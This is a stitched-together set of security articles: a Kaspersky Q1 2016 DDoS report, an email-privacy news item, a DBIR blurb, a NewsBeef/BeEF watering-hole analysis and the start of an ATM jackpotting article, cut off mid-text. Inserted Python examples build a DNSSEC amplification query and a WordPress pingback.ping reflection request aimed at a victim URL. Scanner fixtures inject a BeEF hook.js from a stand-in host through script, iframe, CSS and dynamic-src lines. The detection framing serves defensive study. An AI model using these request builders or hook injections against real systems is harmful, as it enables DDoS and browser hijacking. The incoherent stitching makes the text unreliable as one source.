Kaspersky DDoS Intelligence Report for Q1 2016

Q1 events
We have selected the events from the first quarter of 2016 that, in our view, illustrate the main trends in the field of DDoS attacks and the tools used to perform them.
A record-breaking reflection DDoS attack
DDoS attacks using amplification/reflection techniques remain popular and keep letting cybercriminals set new peak-bandwidth records. Technically, amplification is nothing new in DDoS attacks, but cybercriminals keep finding new ways and resources to increase the capacity of their botnets. For example, according to a recently published report, 2015 saw the largest DDoS attack on record, at 450-500 Gbps.
DDoS attack on Trump
It’s possible that last year’s record didn’t last very long: at the very beginning of the year the official website of Donald Trump’s election campaign was subjected to DDoS attacks whose strength, according to unconfirmed sources, reached 602 Gbps. The hacktivist group New World Hacking claimed responsibility for both this attack and last year’s record-breaking one.
Use of the DNSSEC protocol
Criminals are increasingly using the DNSSEC protocol to carry out DDoS attacks. The protocol is intended to prevent DNS spoofing, but besides the domain data a DNSSEC reply also carries signatures and keys (RRSIG, DNSKEY and related records). Thus, whereas a plain DNS reply over UDP is limited to 512 bytes, a DNSSEC reply, requested with EDNS0 and the DO bit set, can run to about 4096 bytes. Attackers exploit this by spoofing the victim’s address as the source of small queries to DNSSEC-signed domains, so that every reply, many times larger than the query, is delivered to the victim. They usually pick domains in the US government zone .gov, because federal policy requires those domains to deploy DNSSEC.
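As an added example (not from the Kaspersky report), the following Python builds the query an attacker spoofs at a DNSSEC-signed reflector and parses the EDNS0 fields that make the reply large. The 4096-byte figure is the EDNS payload size quoted above; the real reply size depends on the zone. The domain name is a placeholder and nothing is sent on the network.

```python
"""Build and parse the kind of DNS query abused for DNSSEC amplification.

Added example; assumes only the Python 3 standard library. The query is
never sent: it only shows what a reflector receives and why the reply is
so much larger than the request.
"""
import struct

DNS_TYPE_ANY = 255
DNS_TYPE_OPT = 41
DNS_CLASS_IN = 1
EDNS_DO_FLAG = 0x8000   # "DNSSEC OK": asks the server to include RRSIG/DNSKEY data


def encode_name(name: str) -> bytes:
    """Encode a dotted hostname as DNS wire-format labels."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt: bytes, offset: int):
    """Decode uncompressed wire-format labels; returns (name, next_offset)."""
    labels = []
    while True:
        length = pkt[offset]
        offset += 1
        if length == 0:
            break
        labels.append(pkt[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_dnssec_query(name: str, qtype: int = DNS_TYPE_ANY,
                       txid: int = 0x1234, udp_payload: int = 4096) -> bytes:
    """Standard query carrying an EDNS0 OPT record with a large UDP size and DO=1."""
    # Header: ID, flags (RD set), QDCOUNT=1, ANCOUNT=0, NSCOUNT=0, ARCOUNT=1 (the OPT record).
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 1)
    question = encode_name(name) + struct.pack(">HH", qtype, DNS_CLASS_IN)
    # OPT pseudo-RR: root name, TYPE=41, CLASS carries the UDP payload size,
    # TTL carries ext-RCODE/version/flags (DO bit), RDLENGTH=0.
    opt = b"\x00" + struct.pack(">HHIH", DNS_TYPE_OPT, udp_payload, EDNS_DO_FLAG, 0)
    return header + question + opt


def parse_query(pkt: bytes) -> dict:
    """Extract the fields a resolver (or an IDS watching for reflection abuse) cares about."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    off += 4
    info = {"txid": txid, "qname": qname, "qtype": qtype,
            "edns": False, "udp_payload": 512, "do": False}
    if ar:
        off += 1   # root name of the OPT record
        rtype, udp_size, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        if rtype == DNS_TYPE_OPT:
            info.update(edns=True, udp_payload=udp_size, do=bool(ttl & EDNS_DO_FLAG))
    return info


def amplification_factor(query: bytes, response_len: int) -> float:
    """Bytes delivered to the victim per byte the attacker had to spoof."""
    return response_len / len(query)


if __name__ == "__main__":
    q = build_dnssec_query("example.gov")       # placeholder name
    print(len(q), "byte query:", parse_query(q))
    print("amplification at a 4096-byte reply: %.1fx" % amplification_factor(q, 4096))
```

A 40-byte query producing a 4096-byte reply is roughly a 100x amplification, which is why the reflectors in such attacks are chosen for large signed zones; an authoritative server that applies response rate limiting, or an edge filter that drops unexpected large DNS replies to hosts that run no resolver, cuts this off at the victim's side.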
Pingback attacks on WordPress
Web resources powered by the WordPress content management system (CMS) remain popular with cybercriminals carrying out DDoS attacks that exploit the WordPress pingback function. Pingback notifies the author of a post when someone links to it from another site running the same CMS: the linking site sends an XML-RPC request (the pingback.ping method of xmlrpc.php) to the original site, which then fetches the linking page to verify that the link exists. If the administrator has left the function enabled (the default), anyone can send such a request naming an arbitrary URL as the linking page, and the WordPress site will dutifully fetch it. Sending pingback requests to thousands of WordPress sites that all name the same victim URL turns those sites into reflectors whose verification fetches overwhelm the victim, causing a “denial of service”. This feature continues to attract cybercriminals because it lets them perform DDoS attacks at the application level with complete, legitimate-looking HTTP requests.
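As an added example (not part of the report), the Python below shows the pingback.ping body an attacker submits to a reflector and a detector for the verification fetches it triggers, run over constructed access-log lines from a victim. Hostnames and addresses are invented; only the Python 3 standard library is used.

```python
"""Added example: the pingback.ping call abused for reflection, and a detector
for the verification fetches it triggers, run over constructed log lines.
Assumes only the Python 3 standard library; hostnames and IPs are made up."""
import re
from collections import Counter
from xml.sax.saxutils import escape

# Victim-side access log (combined format), constructed for this example.
# A WordPress reflector fetches the claimed "source" URL to verify the link and
# identifies itself in the User-Agent; the trailing IP is the address from which
# the reflector received the XML-RPC call. Random query strings defeat caches.
SAMPLE_LOG = """\
198.51.100.10 - - [06/Feb/2016:12:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "WordPress/4.4.2; http://blog1.example; verifying pingback from 203.0.113.7"
198.51.100.11 - - [06/Feb/2016:12:00:01 +0000] "GET /?8821 HTTP/1.1" 200 5120 "-" "WordPress/4.4.1; http://blog2.example; verifying pingback from 203.0.113.7"
198.51.100.12 - - [06/Feb/2016:12:00:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
198.51.100.10 - - [06/Feb/2016:12:00:02 +0000] "GET /?8822 HTTP/1.1" 200 5120 "-" "WordPress/4.4.2; http://blog1.example; verifying pingback from 203.0.113.7"
"""

COMBINED = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                      r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
PINGBACK_UA = re.compile(r'^WordPress/(?P<ver>\S+); (?P<site>https?://[^;]+); '
                         r'verifying pingback from (?P<origin>\S+)$')


def build_pingback_request(source_uri: str, target_uri: str) -> str:
    """XML-RPC body posted to a reflector's xmlrpc.php. For reflection the attacker
    sets source_uri to the victim and target_uri to any post on the reflector;
    the reflector then fetches source_uri to check that it links to target_uri."""
    return ('<?xml version="1.0"?><methodCall><methodName>pingback.ping</methodName>'
            '<params>'
            f'<param><value><string>{escape(source_uri)}</string></value></param>'
            f'<param><value><string>{escape(target_uri)}</string></value></param>'
            '</params></methodCall>')


def pingback_hits(log_text: str) -> list:
    """One record per request that is a WordPress pingback verification fetch."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if not m:
            continue
        ua = PINGBACK_UA.match(m.group("ua"))
        if not ua:
            continue
        hits.append({"client": m.group("ip"), "reflector": ua.group("site"),
                     "origin": ua.group("origin"), "request": m.group("req")})
    return hits


def summarize(hits: list) -> dict:
    """Per-reflector counts plus the origins the reflectors say they were called from."""
    return {"by_reflector": Counter(h["reflector"] for h in hits),
            "origins": sorted({h["origin"] for h in hits}),
            "total": len(hits)}


if __name__ == "__main__":
    print(summarize(pingback_hits(SAMPLE_LOG)))
    print(build_pingback_request("http://victim.example/", "http://blog1.example/?p=1"))
```

On the victim side the User-Agent pattern is the practical signature: the fetches come from many unrelated WordPress hosts, but every one announces the same "verifying pingback from" origin. On the reflector side a site that does not need pingbacks can remove the method with WordPress's xmlrpc_methods filter or block xmlrpc.php at the web server, and should drop the X-Pingback response header so scanners do not enumerate it.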
Linux Mint hacking
On 21 February 2016, the head of Linux Mint, Clement Lefebvre, reported that someone had managed to hack the project infrastructure including its official website and forum, and substituted the link to the legitimate ISO image of the Linux Mint 17.3 Cinnamon edition with their own URL. The hacker’s modified ISO contained malicious code that used infected machines to perform DDoS attacks.
Attacks on security companies
Cybercriminals also target companies working in information security, with most of the major players – especially those offering anti-DDoS services – having to regularly combat DDoS attacks on their resources. These attacks can’t cause much damage because all these resources are well-protected, but that doesn’t stop the cybercriminals.
In general, cybercriminals don’t go all out to bring down an IT security company’s site. The attacks tend not to last long, and in most cases, they are terminated as soon as the source notices that protection systems are working. The cybercriminals don’t want to waste their botnet resources when they could be earning money elsewhere. Nevertheless, the attacks continue.
Analysis of the correspondence on underground forums suggests that the criminal fraternity uses the websites of IT security companies as a test bed, i.e. to test new methods and tools. From their point of view this is a reasonable approach, and it does give us some valuable information: if worldwide DDoS statistics show the current state of things, attacks on IT security companies allow us to some extent to predict the future of DDoS.
Data on the tactics, strength and types of attacks targeting Kaspersky Lab sites also allows us to forecast the trends in the DDoS industry for the coming months.
Once again, we have had to deal with amplification attacks. Their number has declined slightly compared to last year, but their maximum strength has increased fourfold. This confirms the trend of a general strengthening of these attacks – the criminals have to increase the strength to overcome protection measures used by Internet providers and information security companies. In our case, none of these attacks led to our sites being unavailable.
Judging by the number of attacks on Kaspersky Lab resources in the first quarter of 2016, the “cream” of the cybercriminal community has gone back to the good old methods of attacks at the application level. In the first quarter of this year alone we combated several times more HTTP(S) attacks than in the whole of 2015. Interestingly, several application-layer attacks were performed simultaneously against a number of Kaspersky Lab resources. The strength of the DDoS resources was spread between several targets, reducing the effect on each target. This is most probably because the aim was not to disrupt Kaspersky Lab’s sites but to test tools and to see how we responded. The longest attack of this type lasted less than six hours.
We can assume that the proportion of volumetric attacks at the network and transport layers will gradually decline, and that application-layer and multi-layer attacks (a combination of volumetric and application-layer attacks) will come to the fore.
Powerful UDP amplification attacks came into general use a few years ago and are still a favorite tool of cybercriminals. The reasons for their popularity are clear: they are relatively easy to perform, they can be very powerful with a relatively small botnet, they often involve a third party, and it is extremely difficult to detect the source of the attack.
Although in Q1 of 2016 our Kaspersky DDoS Prevention service continued to combat UDP amplification attacks, we believe that they will gradually disappear. The once daunting task of combining the efforts of Internet providers and IT security companies to effectively filter the junk traffic generated by UDP attacks is almost solved. Having faced the risk of their main channels being clogged up by large volumes of UDP packets, providers have acquired the necessary equipment and skills and cut this traffic off at the root. This means volumetric amplification attacks at the network and transport layers are becoming less effective and, as a result, less profitable.
To execute application-layer attacks on web services, large botnets or several high-performance servers and a wide output channel are required, as well as thorough preparatory work to study the target and find its vulnerabilities. Without this, they are ineffective. If the application-layer attack is carried out properly, it is difficult to counter it without blocking access to legitimate users – malicious requests look authentic and every bot faithfully fulfills the connection procedure. The only anomaly is the high demand for the service. We registered these sorts of attempts in the first quarter. This suggests that the DDoS market has developed so that complex, expensive attacks are becoming cost-effective, and better qualified cybercriminals are trying to make money using them.
Moreover, there is a real danger of these methods being used by cybercriminals en masse – the more popular the technique, the more tools are offered for it on the black market. And if application-layer attacks really do become widespread, we should expect to see a growth in the number of customers for this type of DDoS attack and more competent attackers.
Statistics for botnet-assisted DDoS attacks
Methodology
Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity. The company’s experts monitor botnet activity with the help of the DDoS Intelligence system.
The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data.
This report contains the DDoS Intelligence statistics for the first quarter of 2016.
In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours. If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack. Attacks on the same web resource from two different botnets are also regarded as separate attacks.
The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses. In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics.
It is important to note that DDoS Intelligence statistics are limited to those botnets that were detected and analyzed by Kaspersky Lab. It should also be highlighted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.
Q1 Summary

In Q1, resources in 74 countries were targeted by DDoS attacks (vs. 69 in Q4 of 2015).
93.6% of the targeted resources were located in 10 countries.
China, the US and South Korea remained the leaders in terms of number of DDoS attacks and number of targets. France and Germany were newcomers to the Top 10.
The longest DDoS attack in Q1 2016 lasted for 197 hours (or 8.2 days) which is far less than the previous quarter’s maximum (13.9 days). Multiple attacks on the same target became more frequent (up to 33 attacks on one resource during the reporting period).
SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios, while the number of UDP attacks continues to fall from quarter to quarter.
Overall, command servers remained located in the same countries as the previous quarter, but Europe’s contribution increased – the number of C&C servers in the UK and France grew noticeably.

Geography of attacks
In Q1 2016, DDoS attacks targeted resources in 74 countries (vs. 69 in Q4 2015).
93.6% of targeted resources were located in 10 countries.

Distribution of DDoS attacks by country, Q1 2016 vs. Q4 2015
The Top 3 most targeted countries remained unchanged. However, South Korea’s share grew from 18.4% to 20.4% while the US’s contribution dropped by 2.2 percentage points. Also of note is the fact that Q1 2016 saw an increase in the number of attacks targeting resources in Ukraine – from 0.3% to 2.0%.
The statistics show that 94.7% of all attacks had targets within the Top 10 most targeted countries:

Distribution of unique DDoS attack targets by country, Q1 2016 vs. Q4 2015
The number of targets in South Korea increased by 3.4 percentage points. China’s share fell from 50.3% in Q4 2015 to 49.7% in the first three months of 2016. The share of targets located in the United States also decreased (9.6% in Q1 2016 vs. 12.8% in Q4 2015). Despite the change in figures, South Korea, China and the US maintained their positions in the Top 3, well ahead of all other countries.
The first quarter of 2016 saw Ukraine enter the Top 5 DDoS targets: its share grew from an insignificant 0.5% at the end of last year to 1.9% in Q1 2016.
Taiwan and the Netherlands’ share fell 0.8 and 0.7 percentage points respectively, meaning both dropped out of the Top 10 most attacked countries.
Changes in DDoS attack numbers
In Q1 2016, DDoS activity was distributed more or less evenly, with the exception of one peak on 6 February. The peak number of attacks in one day was 1,272, recorded on 31 March.

Number of DDoS attacks over time* in Q1 2016.
* DDoS attacks may last for several days. In this timeline, the same attack can be counted several times, i.e. one time for each day of its duration.
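The 24-hour rule from the Methodology section and the per-day counting in the note above, as an added example that is not part of the report: the Python below groups constructed C&C observations into attacks per (target, botnet), measures their duration, counts attacks per target, and builds the daily timeline in which a multi-day attack is counted on each day it spans. The timestamps, addresses and botnet names are invented.

```python
"""Added example of the report's counting rules, on constructed C&C observations.
Assumes only the Python 3 standard library; the events and botnet names are invented."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# A pause in the same botnet's activity against the same target that is longer
# than this splits the observations into two separate attacks.
MAX_BREAK = timedelta(hours=24)

# Constructed observations: "<iso-timestamp> <target-ip> <botnet>", one C&C command each.
SAMPLE = """
2016-02-05T10:00:00 192.0.2.10 botA
2016-02-05T20:00:00 192.0.2.10 botA
2016-02-06T09:00:00 192.0.2.10 botA
2016-02-08T12:00:00 192.0.2.10 botA
2016-02-06T10:00:00 192.0.2.10 botB
2016-02-06T11:00:00 192.0.2.20 botA
2016-02-07T10:00:00 192.0.2.20 botA
"""


def parse_events(text: str) -> list:
    """Lines of 'timestamp target botnet' -> sorted (datetime, target, botnet) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, target, botnet = line.split()
        events.append((datetime.fromisoformat(ts), target, botnet))
    return sorted(events)


def group_attacks(events: list) -> list:
    """One attack per (target, botnet) run with no break longer than MAX_BREAK.
    A different botnet hitting the same target is always a separate attack."""
    runs = defaultdict(list)
    for ts, target, botnet in events:
        runs[(target, botnet)].append(ts)
    attacks = []
    for (target, botnet), times in runs.items():
        start = prev = times[0]
        for ts in times[1:]:
            if ts - prev > MAX_BREAK:
                attacks.append({"target": target, "botnet": botnet, "start": start, "end": prev})
                start = ts
            prev = ts
        attacks.append({"target": target, "botnet": botnet, "start": start, "end": prev})
    return attacks


def duration_hours(attack: dict) -> float:
    """Span between the first and last observed command of one attack."""
    return (attack["end"] - attack["start"]).total_seconds() / 3600


def attacks_per_target(attacks: list) -> Counter:
    """How many separate attacks each resource suffered in the period."""
    return Counter(a["target"] for a in attacks)


def daily_counts(attacks: list) -> Counter:
    """Timeline convention: an attack spanning several days is counted once on each
    of them, so the daily totals add up to more than the number of attacks."""
    counts = Counter()
    for a in attacks:
        day = a["start"].date()
        while day <= a["end"].date():
            counts[day.isoformat()] += 1
            day += timedelta(days=1)
    return counts


if __name__ == "__main__":
    attacks = group_attacks(parse_events(SAMPLE))
    for a in attacks:
        print(a["target"], a["botnet"], a["start"], "->", a["end"], "%.0fh" % duration_hours(a))
    print("attacks per target:", attacks_per_target(attacks))
    print("daily timeline:", sorted(daily_counts(attacks).items()))
```

Because the end of an attack is only known once the 24-hour silence has elapsed, a production pipeline has to run this grouping with a one-day lag or treat the most recent run as provisional.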
As in the previous quarter, Monday (16.5% of attacks) was the most active day of the week for DDoS attacks. Thursday moved up to second (16.2%). Tuesday, which was second in Q4 2015, fell from 16.4% to 13.4% and became the quietest day of the week in terms of DDoS attacks.

Distribution of DDoS attack numbers by day of the week
Types and duration of DDoS attacks
The ranking of the most popular attack methods remained unchanged from the previous quarter. SYN DDoS was still used most often, although its share fell (54.9% vs. 57.0% in Q4 2015), followed by TCP DDoS, which fell by 0.7 percentage points. The proportion of ICMP DDoS attacks grew significantly, rising to 9%; however, this did not affect the order of the Top 5.

Distribution of DDoS attacks by type
Noticeably, the figure for UDP DDoS has fallen continually over the last year: from 11.1% in Q2 2015 to 1.5% in Q1 2016.
Like the previous quarter, about 70% of attacks lasted no more than 4 hours. At the same time, the maximum duration of attacks decreased considerably. The longest DDoS attack in the last quarter of 2015 lasted for 333 hours; in Q1 2016, the longest registered attack ended after 197 hours.

Distribution of DDoS attacks by duration (hours)
C&C servers and botnet types
In Q1, South Korea remained the leader in terms of the number of C&C servers located on its territory, with its share growing from 59% in the previous quarter to 67.7% in the first quarter of 2016.
China came second; its share grew from 8.3% to 9.5%. As a result, China pushed the US down to third (6.8% vs 11.5% in Q4 of 2015). For the first time during the reporting period France appeared in the Top 10 countries hosting the most C&C servers. This correlates with the increased number of attacks in the country.

Distribution of botnet C&C servers by country in Q1 2016
99.73% of DDoS targets in Q1 2016 were attacked by bots belonging to one family. Cybercriminals launched attacks using bots from two different families (used by one or more botnet masters) in just 0.25% of cases. In 0.01% of cases three or more bots were used, mainly from the Sotdas, Xor and BillGates families.

Correlation between attacks launched from Windows and Linux botnets
When it came to the number of attacks launched from Windows and Linux botnets in Q1 2016, Windows-based botnets were the clear leader. For the third quarter in a row, the difference between the share of Windows- and Linux-based attacks was approximately 10 percentage points.
Conclusion
The events of the first quarter of 2016 once again demonstrated that the attackers are not resting on their laurels and are increasing the computing resources they bring to DDoS attacks. Amplification scenarios, which have de facto become the standard tool for a powerful attack, exploit weaknesses in an ever-growing range of network protocols, DNSSEC being the latest example. The reasons for an attack vary: from disrupting pre-election campaigns and attacking candidates’ resources to showdowns between competitors on the black market. There have been frequent incidents of DDoS attacks targeting the very organizations that specialize in countering them. With the spread of vulnerable devices and workstations and the abundance of configuration weaknesses at the application level, the cost of a significant attack is going down. Reliable protection is therefore needed to make these attacks financially unviable for the criminals.



In rare unanimous move, House passes bill to protect email and cloud privacy

The U.S. House of Representatives, in a rare unanimous vote, has approved a bill to strengthen privacy protections for email and other data stored in the cloud.

The Email Privacy Act would require law enforcement agencies to get court-ordered warrants to search email and other data stored with third parties for longer than six months. The House on Wednesday voted 419-0 to pass the legislation and send it to the Senate.

The bill, with 314 cosponsors in the House, would update a 30-year-old law called the Electronic Communications Privacy Act (ECPA). Some privacy advocates and tech companies have been pushing Congress to update ECPA since 2011.



Contributing to the Annual DBIR

This year’s DBIR release from Verizon exposes valuable and well-organized data on global incidents over the past year. Our contributions on targeted attack activity and other areas to a report like this one over the past several years are important in helping to improve cyber-security awareness and education, both in the security industry and among the general public.

The report is well organized, offering trending information from Point of Sale incidents to cyber-espionage, web application hacking, cybercrime, and skimming. And it simplifies most of the data into nine categories for ease of discussion. The data demonstrates that intruders will use tried and true techniques before moving on to the newest and most expensive. Like most years in cybersecurity, “It’s like déjà vu, all over again.” —Yogi Berra

You can download the 2016 DBIR here; its 85 pages of data and diagrams can help inform discussion of these topics on a greater scale. We look forward to another great write-up in 2017 from the DBIR team at Verizon.



Freezer Paper around Free Meat

BeEF Wrapped Up and Delivered in 2016
In late February 2016, a university website in Iran stood out for how thoroughly it “vetted” its current and potential students and staff. The university’s website served repackaged content from the Browser Exploitation Framework (BeEF), with embedded JavaScript capable of hooking visitors’ web browsers, identifying visited websites and domains, probing for vulnerabilities (we did not observe any auto-pwning) and tracking visitors through evercookies. Even a partial list of visited sites is sensitive and valuable information, and this sort of “sites visited” data gathering via other techniques, such as screen grabbing and keylogging, was observed in past APT incidents like the Madi campaigns. Currently, it’s advisable to avoid the site.

The embedded BeEF content appears not to be fully configured, and only partially implemented. Perhaps a limited data set was of interest for this attacker, or this was an early attempt at deploying BeEF.
This incident is interesting because at the same time, and a little earlier, another group was relying heavily on repackaged open source offensive security products in its toolset, deploying both BeEF and Metasploit-produced components across a select set of strategic web compromises. This particular APT has years of low-tech but elaborate social engineering schemes and re-purposed open source efforts under its belt.

While we call them the NewsBeef APT, they have been reported in the past as Charming Kitten or Newscaster in 2014, social engineering their way into sensitive circles of trust with spoofed LinkedIn profiles and phony news media organizations.
They continue to be highly active, but this time, they are using a slightly more technical toolset. On one hand, they have developed skills or discovered tools to compromise select web applications and sites, supporting their watering hole campaigns. On the other hand, they have repackaged leaked bot source code and repackaged open source Metasploit and PowerSploit components to produce and administer backdoors and downloaders.
NewsBeef/Newscaster will find a way to compromise a website; usually the vulnerability appears to be CMS-related, in an outdated WordPress plugin, Joomla version or Drupal version. Attackers then usually do one of two things (NewsBeef has been doing the first):

inject a script src or iframe link into web pages or CSS stylesheets
inject the content of an entire BeEF web page into one of the internally linked JavaScript helpers

The injected link redirects visitors’ browsers to a BeEF server. Usually the attackers deliver some of the tracking, system/browser identification and evercookie capabilities. Sometimes they appear to deliver the Metasploit integration to exploit browsers and drop backdoors (we haven’t identified that exploitation activity in our Kaspersky Security Network (KSN) data for this group just yet). Sometimes it is used to pop up spoofed login fields to steal social networking site credentials; we haven’t detected that in KSN either, but some partners have privately reported it in various incidents. What we have identified is that the attackers redirect specific targets to laced Adobe Flash and other installers from websites that they operate.
So, the watering hole activity isn’t always and usually isn’t delivering backdoors. Most of the time, the watering hole injections are used to identify and track visitors or steal their browser history. Then, they deliver the backdoors to the right targets.
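The two injection styles described above, as an added example that is neither NewsBeef's nor BeEF's code: the Python below statically scans page fragments for script or iframe sources, CSS imports and dynamically assigned script sources that leave the site's origin, which is how a hooked page is usually found. It flags by origin rather than by the cookie or file name, since those are trivially renamed. The site name, the 203.0.113.5 host and the page fragments are constructed; only the Python 3 standard library is used.

```python
"""Added example (not NewsBeef's or BeEF's code): a static scan for injected
off-origin loads in HTML, CSS and JavaScript helpers. Assumes only the Python 3
standard library; the site, the 203.0.113.5 host and the fragments are invented."""
import re
from urllib.parse import urlparse

PATTERNS = {
    "html": [("script-src", re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I)),
             ("iframe-src", re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.I))],
    "css":  [("css-import", re.compile(r'@import\s+(?:url\()?\s*["\']?([^"\')\s;]+)', re.I)),
             ("css-url", re.compile(r'url\(\s*["\']?([^"\')\s]+)', re.I))],
    "js":   [("dynamic-src", re.compile(r'\.src\s*=\s*["\']([^"\']+)["\']'))],
}


def _host(url: str):
    """Hostname of an absolute or protocol-relative URL; None for a relative path."""
    return urlparse(url).hostname


def external_loads(content: str, kind: str, site_host: str, allow=()) -> list:
    """(label, url) for every load that leaves the site's origin and is not in the
    allow-list of known third parties (CDNs, analytics). Relative paths are skipped."""
    seen, hits = set(), []
    for label, rx in PATTERNS[kind]:
        for url in rx.findall(content):
            host = _host(url)
            if host is None or host == site_host or host in allow or url in seen:
                continue
            seen.add(url)
            hits.append((label, url))
    return hits


def scan_site(pages: dict, site_host: str, allow=()) -> dict:
    """pages: {name: (kind, content)} -> {name: hits}; pages with no hits are dropped."""
    report = {}
    for name, (kind, content) in pages.items():
        hits = external_loads(content, kind, site_host, allow)
        if hits:
            report[name] = hits
    return report


# Constructed fragments: a legitimate CDN script, plus the two injection styles
# pointing at a hook server (BeEF's default hook file is hook.js on port 3000).
SITE = "www.university-site.example"
HTML = """<html><head>
<script src="/wp-includes/js/jquery.js"></script>
<script src="https://cdn.example/lib.js"></script>
<script src="http://203.0.113.5:3000/hook.js"></script>
</head><body>
<iframe src="//203.0.113.5:3000/demos/basic.html" width="0" height="0"></iframe>
</body></html>"""
CSS = '@import url("http://203.0.113.5:3000/x.css");\nbody { background: url(/img/bg.png); }'
JS = ("function init(){}\n"
      "var s=document.createElement('script');s.src='http://203.0.113.5:3000/hook.js';"
      "document.head.appendChild(s);")

if __name__ == "__main__":
    pages = {"index.html": ("html", HTML), "style.css": ("css", CSS), "helper.js": ("js", JS)}
    for name, hits in scan_site(pages, SITE, allow={"cdn.example"}).items():
        for label, url in hits:
            print(f"{name}: {label} -> {url}")
```

A regex scan only catches plainly written URLs; a hook whose address is assembled at run time or hidden in an obfuscated helper needs the page executed in an instrumented browser, and on the network side the hook's regular polling of one unknown host is the complementary signal.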
In addition to the University site and the NewsBeef APT, in the past couple of months, we identified a variety of compromised sites around the world serving the BeEF. Most are cleaned up. Deployments to interesting and strategic web sites and their true reach on a global scale appears to be on the increase:

Middle eastern embassy in the Russian Federation
Indian military technology school
High conflict regional presidency
Ukrainian ICS Scanner mirror
European Union education diversification support agency
Russian foreign trade management organization
Progressive Kazakh news and politics media
Turkish news organization
Specialized German music school
Japanese textile manufacturing inspection corporate division
Middle Eastern social responsibility and philanthropy
surprisingly popular British “lifestyle” blog
Algerian University’s online course platform
Chinese construction group
Russian overseas business development and holding company
Russian gaming developer forum
Romanian Steam gaming developer
Chinese online gaming virtual gold seller
Brazilian music instrument retailer

 
BeEF Capabilities
Key to these incidents are the development, distribution, and ease of use of toolkits like BeEF.

BeEF itself is an open source collection of tools and tricks, some years old, that combined together can effectively hook a visiting web browser for evaluation and full exploitation. Because of its capabilities, we have seen increased adoption of the framework for the past year or so.

Browser enumeration and reporting
Plugin enumeration and reporting
Retrieve visited domains (based on an old browser cache fetch timing trick)
Social engineering via live sessions and phishing within the browser
Network exploration, discovery, and exfiltration tunneling
Metasploit exploit integration and autopwning
Evercookie deployment for persistent tracking – multiple platforms
XSS evaluation and exploitation

At the same time, many of the techniques implemented are very old and public. The kit is extensible and customizable, and integrates with Metasploit for auto-pwning. Some of the techniques were discussed during Jeremiah Grossman’s 2006 Black Hat conference presentation. The delay in deployment of techniques of this type indicates that some teams depend on open source tool packaging and ease of use. We have seen this sort of reliance on both open source offensive toolkits and legitimate software in the past from APTs such as Crouching Yeti and TeamSpy, and now NewsBeef.
Fighting against the use of browser hooking frameworks for identification, tracking, live session social engineering, and precision and auto-exploitation effectively requires a mix of technologies. When these JavaScript-based frameworks are used in a malicious manner, the combination of network and host based detection is required to fully handle more serious incidents.
Unfortunately, these incidents are on the increase. You can disable JavaScript in your own browser with NoScript, but that’s much like just moving to Lynx or a text-based browser – people don’t want that because it kills functionality in the browser they do want. A Chrome plugin that detects the BeEF cookie is easily evaded by serious players. And preventing the tracking methods altogether is another whole ball of wax, because much of the functionality is tied into legitimate web pages by third party marketers and retailers.
Preventing the social engineering sessions for credential theft and Metasploit exploit integration makes immediate sense and can be incorporated at the network and more effectively at the host level. AntiAPT can help wipe out most of an operation on the network at scale, but these measures can be evaded as well. In other words, dealing with a determined attacker using tools like this one is difficult.
References
NEWSCASTER – An Iranian Threat Inside Social Media
The Browser Exploitation Framework Project
Metasploit: Penetration Testing Software



Malware and non-malware ways for ATM jackpotting. Extended cut

Cash machines have been part of our lives since 1967 when a London branch of Barclays Bank unveiled the first ATM. Millions of people around the world now use ATMs every day to withdraw cash, pay in to their account or make a variety of payments. When using ATMs people give little or no thought to the hardware, software or security of the machines. Unfortunately, ATM manufacturers and their primary customers – banks – don’t pay much attention to the security of cash machines either. This is confirmed by the increasing number of thefts from ATMs using non-destructive methods, i.e. without the use of metal cutting tools or explosives.
To understand why this is happening, let’s first look at what exactly a cash machine is.
Hardware
An ATM is basically a construction kit. The manufacturer builds it from a dispenser, a card reader and other units produced by different companies. The units are placed in a housing which usually consists of two parts: the top box, called the cabinet or the service zone, and the lower section, called the safe.
The cabinet includes units such as the system unit (yes, a standard PC system unit, which sometimes even has the same housing as a typical home computer), the EPP (Encrypting PIN Pad), the card reader, and so on. The service zone, according to ATM manufacturers, contains nothing that gives access to the money. Probably for this reason the cabinet cover is made of plastic and the service zone is protected from unauthorized access by just a simple lock. Moreover, a set of locks and separate keys can easily be purchased online, because the manufacturers install the same locks on their devices and most banks don’t bother to replace them.
The safe has much better protection: it is a ‘sandwich’ of steel and concrete with two types of locks, a combination lock (electronic or mechanical dial, sometimes electro-mechanical) and a key lock (usually a lever tumbler lock). The safe contains the devices directly related to the money: the dispenser from which cash is withdrawn, and the cash-in module.
